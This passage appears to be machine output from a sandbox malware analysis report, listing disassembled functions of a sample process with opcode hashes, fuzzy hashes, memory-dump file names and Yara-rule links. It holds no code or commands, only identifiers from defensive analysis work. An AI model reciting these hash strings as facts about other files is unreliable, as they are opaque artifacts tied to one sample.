                                                      • Opcode ID: 468d823ddbd801f7b483053772833cf60b55d9d01e2d7401892e6117fc0a42c9
                                                      • Instruction ID: 3605cbecb09a8d6f084259c7d3fcf256a232622516c533e871cf89c2cb602efb
                                                      • Opcode Fuzzy Hash: 468d823ddbd801f7b483053772833cf60b55d9d01e2d7401892e6117fc0a42c9
                                                      • Instruction Fuzzy Hash: DBB19E305195A68FEB68DF18D0D05B437A2FF48350B5456FDD86A8B68BCB38E881CB81
                                                      Function 00007FF849273BDA Relevance: .3, Instructions: 286COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b084a3a39d1bdb44ae88974af25179b96d6de8e873e04ad7389ac312bc6ba6a9
                                                      • Instruction ID: fdb15a42f75c4f0421de46485a3bfa42d595050f60ba097fac5884bbbb0f2567
                                                      • Opcode Fuzzy Hash: b084a3a39d1bdb44ae88974af25179b96d6de8e873e04ad7389ac312bc6ba6a9
                                                      • Instruction Fuzzy Hash: 73B1A03051D5A68FEB58EF18D4D05B13BA2FF49350B5446FDD85A8B68AC638E882CB80
                                                      Function 00007FF8492728A6 Relevance: .3, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ca15d06cf512456c4c8a4d344391965fc64a81594da8cb19fde0c0cce12a020
                                                      • Instruction ID: 6762b763349c1a2b365924e523bce1fced471a13225413837deccf8f45f8b6f4
                                                      • Opcode Fuzzy Hash: 8ca15d06cf512456c4c8a4d344391965fc64a81594da8cb19fde0c0cce12a020
                                                      • Instruction Fuzzy Hash: 29813831D0CA928FF778AE2894551B577E2EF553A0F1404BED4AFD3193DE28B8428751
                                                      Function 00007FF8492778F6 Relevance: .3, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4980494c3ec8ab0c48c1bbb0b0be95083369ea7d02cc8af717753a5c1db2689
                                                      • Instruction ID: c30e11e7bf38190be795cc9295b61a2d7db7c746a354014ddf668d0a7f5242da
                                                      • Opcode Fuzzy Hash: b4980494c3ec8ab0c48c1bbb0b0be95083369ea7d02cc8af717753a5c1db2689
                                                      • Instruction Fuzzy Hash: 22813A3190DA968FF379AF28944117977E6EFC5390F1405BED0AED3183DE2879028752
                                                      Function 00007FF84927DAF6 Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 26abc417c8a1a3dac09e094affa26165bf8d26422e5158829f82ce52e7179594
                                                      • Instruction ID: 7a7ec249b92ba2907c03c27169710c5c9d3aac0c088f6880370eb6a7dff6b794
                                                      • Opcode Fuzzy Hash: 26abc417c8a1a3dac09e094affa26165bf8d26422e5158829f82ce52e7179594
                                                      • Instruction Fuzzy Hash: A181383190CA928FF378BE2894452B5B7E2EF85390F1405BFD49ED7182DE28B8028755
                                                      Function 00007FF849278B2A Relevance: .2, Instructions: 248COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c17363f77e597d329281a9a80529702761a0cf242ecf0905af47c6848acb98b
                                                      • Instruction ID: 404c8238b17c7ab84dd14ab76cb5a2646c2170bbed2036d0a4c35659010a6ecc
                                                      • Opcode Fuzzy Hash: 2c17363f77e597d329281a9a80529702761a0cf242ecf0905af47c6848acb98b
                                                      • Instruction Fuzzy Hash: 5291F23091D5A68FEB6DDF1494E06B57BA2FF41300F4448FDD46E9B18BCA38A845C742
                                                      Function 00007FF849270A09 Relevance: .2, Instructions: 246COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1012cb8738de60c955e40ac9bde18c167959695f4170927c0385b16ffd1f638f
                                                      • Instruction ID: b525309b4746ef84d70557b95fce58bd6a480d44e731f35d21edca19db7ccfd1
                                                      • Opcode Fuzzy Hash: 1012cb8738de60c955e40ac9bde18c167959695f4170927c0385b16ffd1f638f
                                                      • Instruction Fuzzy Hash: 4371573198C49A4FF778FE5888565B537C2FF48350B1012FAD1AED35A2DE28A90E8781
                                                      Function 00007FF849275A39 Relevance: .2, Instructions: 245COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d59037868d827570a0f25b5a425437ad1db855cf0ec7224f2443059f1652e00f
                                                      • Instruction ID: 723830bda4ebe37db5a814eb298c1652ba03a8c04ff359579616e7287d202ccc
                                                      • Opcode Fuzzy Hash: d59037868d827570a0f25b5a425437ad1db855cf0ec7224f2443059f1652e00f
                                                      • Instruction Fuzzy Hash: 8E71693190C9DB4FF778FE1888569B5B7C2FF84350B0412FAD0AED7596DE18A80A8781
                                                      Function 00007FF849273AB5 Relevance: .2, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3aee649b471cd1446ac1e1d892b4ecef58325811c35fbb2d0a21d8ffbff4a7e2
                                                      • Instruction ID: 4b4dae08b73af26e326ad501fe05c4c11d630c33d800df512f5830cd3eeb82ab
                                                      • Opcode Fuzzy Hash: 3aee649b471cd1446ac1e1d892b4ecef58325811c35fbb2d0a21d8ffbff4a7e2
                                                      • Instruction Fuzzy Hash: B881063091C5A68FFB2DEF18A4A06B67BB2FF55340F1445F9D45E9B18BCA38A841C742
                                                      Function 00007FF849273ADF Relevance: .2, Instructions: 178COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 55ed7cfbd5e98110cd057125c15004b4c62bb62e0d37d636fd773ad7d60ac976
                                                      • Instruction ID: d99fe8350a42748bf228cc9ed2aaf15d2aca02cb687f94e2d718c3322da2d127
                                                      • Opcode Fuzzy Hash: 55ed7cfbd5e98110cd057125c15004b4c62bb62e0d37d636fd773ad7d60ac976
                                                      • Instruction Fuzzy Hash: 5D51E13091D5A28FFB2DAF18E4A05727BA2FF51340B1489FDD46B8B58BCA38E451C751
                                                      Function 00007FF848E808D0 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44e8d50814ed0806100a448a958b1df374ea9bfc76325b28329d69f9bbd8fc66
                                                      • Instruction ID: c4aaa9a2f10650f8c8a440d4744d54f8a318076a1df2368f02130174d65f7c6c
                                                      • Opcode Fuzzy Hash: 44e8d50814ed0806100a448a958b1df374ea9bfc76325b28329d69f9bbd8fc66
                                                      • Instruction Fuzzy Hash: 9041AF52A4E9552EE309B37CA0952FD7780EF45361F1845FFD04CC70D3CE286881C699
                                                      Function 00007FF849275127 Relevance: .1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed51442470d9f0bc07e43958a17adcf82ccc1339bb42bd8f098adbced74ca10e
                                                      • Instruction ID: 144d41861423efccd3cb79a8ffa207143d782642fb7f445d5dc7fcb3df60d427
                                                      • Opcode Fuzzy Hash: ed51442470d9f0bc07e43958a17adcf82ccc1339bb42bd8f098adbced74ca10e
                                                      • Instruction Fuzzy Hash: 3C416E31A0C94ACFDB98EF2CD495EB5B7E1FB68310B0441AAD00EC7282DE34E845CB91
                                                      Function 00007FF84927A177 Relevance: .1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05e419f49b7bab17c04dff82533f41b20852e7ad7f5b717a2d102f2f6a5831fd
                                                      • Instruction ID: 76c95036575c135cf6c8499722c7576f8f365e8109bbd07a68a0f231efe4bcc6
                                                      • Opcode Fuzzy Hash: 05e419f49b7bab17c04dff82533f41b20852e7ad7f5b717a2d102f2f6a5831fd
                                                      • Instruction Fuzzy Hash: D5418231A0C959DFDB98FF28C4959B5B3E2FBA9320B0441AAD00EC3592DE35F845CB91
                                                      Function 00007FF84927A221 Relevance: .1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b9819c2fd9e0a84f0350e24f9ed072efc248fff07eb8a2c0fa8370247d182a85
                                                      • Instruction ID: 91233851be3167ff35bcfc8f2101fd7bc15a5925b8180fee12bcac567481eb6c
                                                      • Opcode Fuzzy Hash: b9819c2fd9e0a84f0350e24f9ed072efc248fff07eb8a2c0fa8370247d182a85
                                                      • Instruction Fuzzy Hash: A6318031A0C9599FDB5CEF28C4A59B573E1FBA9320B0446A9D00EC7592CE35F844CB91
                                                      Function 00007FF8492751D1 Relevance: .1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 796db8301a107b46ee97c62b6abddef82a115fe372f30c4d18834927c5d0de4f
                                                      • Instruction ID: b23fda8fa155cd83436b54fdff542eae803b0a522edc24baacb5f6aab34fc007
                                                      • Opcode Fuzzy Hash: 796db8301a107b46ee97c62b6abddef82a115fe372f30c4d18834927c5d0de4f
                                                      • Instruction Fuzzy Hash: 6B316F31A0C9458FDB98EF2CC465EB5B7E1FB68310B0845AAD01EC7292DE34E841CB91
                                                      Function 00007FF84927516B Relevance: .1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbaf1e75b92a5f8d48883c42b48e7fecff6815354e967c265c9e947b523138ea
                                                      • Instruction ID: 168051a9b19a08db5b61f8cd9be38c3c6d2d0ee78655b381110c2280fcb0ce4f
                                                      • Opcode Fuzzy Hash: cbaf1e75b92a5f8d48883c42b48e7fecff6815354e967c265c9e947b523138ea
                                                      • Instruction Fuzzy Hash: 4F314131A0C94ADFDB98EF2CC465EB5B7E2FB68310B0445A9D00EC7296DE34E845CB91
                                                      Function 00007FF84927A1BB Relevance: .1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8f0d7ad96ffde05943bf34fa2c302b9986d7c6b5f4ad7fefeb9ca04da7e5e67
                                                      • Instruction ID: feec06cb3cc266383b3e757087c6e732c2de1a85110241edf9a33fddf3fb4888
                                                      • Opcode Fuzzy Hash: d8f0d7ad96ffde05943bf34fa2c302b9986d7c6b5f4ad7fefeb9ca04da7e5e67
                                                      • Instruction Fuzzy Hash: A4319131A0C9599FDB98FF28C095AB5B3E2FBA8310B0401A9D00EC7592CE35F845CB91
                                                      Function 00007FF848E80998 Relevance: .1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6b74d89b9f5b58208dc6abb880900e781d08d707483133437045bb9ae8ffcc0
                                                      • Instruction ID: dd3fc1966917eac34b9343e8018014efee46056d9ff8bf4f6b5af9f816da0301
                                                      • Opcode Fuzzy Hash: c6b74d89b9f5b58208dc6abb880900e781d08d707483133437045bb9ae8ffcc0
                                                      • Instruction Fuzzy Hash: AC313820B1C8495FE798B73C544A6BD72C2FF89355F9400B9E40EC32D3DE38AC818645
                                                      Function 00007FF849274F35 Relevance: .1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65fe7b9955d62c2a7719b3167185528682e01c98ebffae32a9ece7d691ca393d
                                                      • Instruction ID: ed952a28b6dfc6206fd989ca74c2a784bc76342fcf5e84970d1558972f770bca
                                                      • Opcode Fuzzy Hash: 65fe7b9955d62c2a7719b3167185528682e01c98ebffae32a9ece7d691ca393d
                                                      • Instruction Fuzzy Hash: FC311B30D1C99ACFFBA8EF5884519BD77B3FF49380F5045BAD02EE6581DA3869408B42
                                                      Function 00007FF849279F85 Relevance: .1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d16c05860c65509853ab0c840c97302e08bf2284c865d8c509236253b0bf053
                                                      • Instruction ID: fc4f89378cd6ae8f6adbf33ed37ad4a28666ff725adad13508ca59306d11ea81
                                                      • Opcode Fuzzy Hash: 0d16c05860c65509853ab0c840c97302e08bf2284c865d8c509236253b0bf053
                                                      • Instruction Fuzzy Hash: 6B313E34D0D9AADFFB68EF5484556BD77B2FF48390F5009BAD02EE6181DB3968408742
                                                      Function 00007FF848E81171 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 162cb4d8969dbbe90d88bc2ba71dbf77948fc1b7c265a63989444b7db14002f2
                                                      • Instruction ID: fb581e7c356e9b29c2b55d7629ce1c9440e91ea9824219370d0fa3e81fc1bfcc
                                                      • Opcode Fuzzy Hash: 162cb4d8969dbbe90d88bc2ba71dbf77948fc1b7c265a63989444b7db14002f2
                                                      • Instruction Fuzzy Hash: 4331703190D68A8FDB46EB64C8659AD7BF1FF16340F4805FAC009D71A3DB39A844C751
                                                      Function 00007FF8492706D1 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0a6b30835753569b399e3fb377874a6924e33737344916b3719d151e6d266a3
                                                      • Instruction ID: 49082bded782d0cbfe950581b94f3bdd02847f86bacc2d5148fe69530f79f486
                                                      • Opcode Fuzzy Hash: f0a6b30835753569b399e3fb377874a6924e33737344916b3719d151e6d266a3
                                                      • Instruction Fuzzy Hash: 9C318F30D5DADD9FEB55EFA8C8605ED7BB1FF59340F1400BAD00AE7292DA286809CB51
                                                      Function 00007FF848E80960 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: befe6d701e65633f30c11b5073a3516470634e45d6e65039f73df9b89536824c
                                                      • Instruction ID: 9fc71dcb523808c67d5eff623a72977af7655a5312a2a1c4c39002b60bea83e2
                                                      • Opcode Fuzzy Hash: befe6d701e65633f30c11b5073a3516470634e45d6e65039f73df9b89536824c
                                                      • Instruction Fuzzy Hash: 22213451A4DD5A3EF75CB27C644A2FD62C1EF483A1F5854BAE40DC31D3CE2CAC8086A9
                                                      Function 00007FF849278E70 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82542b28c3d0b27afcfe6e08ae6ff8fb38b213c318bc2e6c1e2caa5b400f0d7e
                                                      • Instruction ID: bab05a4dac83dd1f2c395ca12cc164d679fc008f699649bf03429326d5568c01
                                                      • Opcode Fuzzy Hash: 82542b28c3d0b27afcfe6e08ae6ff8fb38b213c318bc2e6c1e2caa5b400f0d7e
                                                      • Instruction Fuzzy Hash: 3D31E51091D5F68FF33A9A1844A45B47B93EF913517184EFAD0AB9A9C7C92CB8818392
                                                      Function 00007FF849273E21 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66ce556b664205251022794c753168042992d1f0e6ee4a8c34b600f0446a49b4
                                                      • Instruction ID: f6912038899d0db391d615e9841fbddd685c8da81390efbbed24c7d4fb587604
                                                      • Opcode Fuzzy Hash: 66ce556b664205251022794c753168042992d1f0e6ee4a8c34b600f0446a49b4
                                                      • Instruction Fuzzy Hash: 8B313E1091C5F78FF73A9A1C78605767F62EF51390B1889F6D09B9B0C7C52CA841C352
                                                      Function 00007FF848E82A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction ID: e2916f8f3927bac2856ae2f3f79d098971771a8ef401f154be0260b14a816d97
                                                      • Opcode Fuzzy Hash: 035c5ad3b146be40c5fbf1f7ea6f0c1f034e7770c03c8b43d4b1691ea0a8c3ca
                                                      • Instruction Fuzzy Hash: 03214C21E0C90A8FEBA4FB6884587BC22D2FF94391F9546B5D40DD32A2DF38AC418758
                                                      Function 00007FF84927C472 Relevance: .1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1f38b9348afce7dd4513f3edab267a601faa16f68272e9b18dbc90bca9f6bb6
                                                      • Instruction ID: df10cda79edc33ff9c8bcc79729e3f662a7fc0f0ee8efaf71eaee789c2b99895
                                                      • Opcode Fuzzy Hash: f1f38b9348afce7dd4513f3edab267a601faa16f68272e9b18dbc90bca9f6bb6
                                                      • Instruction Fuzzy Hash: CF21F974E189599FDFA8EF18C465AFDB7B1FB58310F0001A9D01EE3291CB35A9418B50
                                                      Function 00007FF849271242 Relevance: .1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 868f1101185b3861d0845cd8298ef8b7bb22786923c79e64e03785a3adef46c3
                                                      • Instruction ID: 4aca8621f8fe5fed063106a2a77089848e902f52c78109fe6df024f327b32a0b
                                                      • Opcode Fuzzy Hash: 868f1101185b3861d0845cd8298ef8b7bb22786923c79e64e03785a3adef46c3
                                                      • Instruction Fuzzy Hash: 0A21FA30E0891D9FDF98EF58C465AEDB7B1FF68304F0041AAD01EE3291CA35A9818B40
                                                      Function 00007FF84927CF53 Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 575e2a1ab5fa6132b05807963e5d792af7b99dd697dd0ac434bcf5c80d67067f
                                                      • Instruction ID: 2f0125bd490dbc9aa2abb45b99ef7866c631973d1ff11eb9960df828aa0e88be
                                                      • Opcode Fuzzy Hash: 575e2a1ab5fa6132b05807963e5d792af7b99dd697dd0ac434bcf5c80d67067f
                                                      • Instruction Fuzzy Hash: 5021C231E1C5598FEBA8FF28D89567873E2FF59351F4005BAD05ED3692CB246C428B41
                                                      Function 00007FF848E80C25 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c5dc90589121a49dd3d0a43fed02cab70f8c16391928d2eac555b5815fea55a
                                                      • Instruction ID: 5bbf1aa4118902505df78f88398c732ff99c1fd573bf0b5634c4520a4a11550c
                                                      • Opcode Fuzzy Hash: 3c5dc90589121a49dd3d0a43fed02cab70f8c16391928d2eac555b5815fea55a
                                                      • Instruction Fuzzy Hash: 1621D331A0D6899FE711FF28C8452EC7BA0FF42351F5445FAC0449B1D2DB3815498B65
                                                      Function 00007FF849275728 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6613fb47b7288cbde9f375ac5fbe2d52ea6203a7bd7a1bc913f55d6bf98e3eb3
                                                      • Instruction ID: 4b406653874c99902a03d0bfd6e68a1c5c917603a64b565f951db2899356ace8
                                                      • Opcode Fuzzy Hash: 6613fb47b7288cbde9f375ac5fbe2d52ea6203a7bd7a1bc913f55d6bf98e3eb3
                                                      • Instruction Fuzzy Hash: 0D213931D1C99EEFEB94EF58C8509EDBBB2FF58340F5401B9D01AE3281DA246905CB54
                                                      Function 00007FF84927CFB7 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
